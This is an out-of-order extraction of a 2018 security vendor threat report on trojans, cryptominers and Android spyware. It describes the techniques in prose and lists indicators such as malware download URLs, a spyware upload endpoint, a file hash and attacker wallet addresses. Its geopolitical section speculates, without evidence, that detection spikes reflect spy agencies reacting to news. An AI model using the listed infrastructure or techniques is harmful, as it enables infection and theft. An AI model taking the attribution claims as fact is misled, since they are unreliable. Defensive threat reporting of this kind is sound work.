532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 8 of 73
22 PowerShell-based attack with Emotet Another alarming trend is related to malware itself rather than its delivery method Often cybercriminals use malware based not on Windows native exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer This type of attack is much harder to detect with antivirus tools
Emotet is one of the most aggressive trojans currently acting in cyberspace Spread by various infection vectors and backed by a huge network of compromised hosts it heavily affects many individuals and companies
The following attack started with the email that imitated a message from IRS about ldquoTax Account Transcriptrdquo Notice the message is written in a cheerful manner to inspire user trust
The phishing email
Global Threat Report Q2 2018 Edition
Page 9 of 73
The attached file is an Office document containing a VBScript As the settings of the newly installed Microsoft Office do not allow execution of such scripts by default the attackers added a special option to convince the victims to turn on VBScript execution
The special option to convince the victims to turn on VBScript execution
Global Threat Report Q2 2018 Edition
Page 10 of 73
The purpose of the VBScript is to launch PowerShell
Global Threat Report Q2 2018 Edition
Page 11 of 73
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of the writing only thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb)
The binary moves itself to CWindowsSysWOW64lanesviewerexe and creates a service ldquolanesviewerrdquo to ensure persistence
The malware creates ldquolanesviewerrdquo service to ensure persistence
Global Threat Report Q2 2018 Edition
Page 12 of 73
And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server
The next example is even more cunning because it infects computers with popular legitimate Microsoft software
23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work
The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
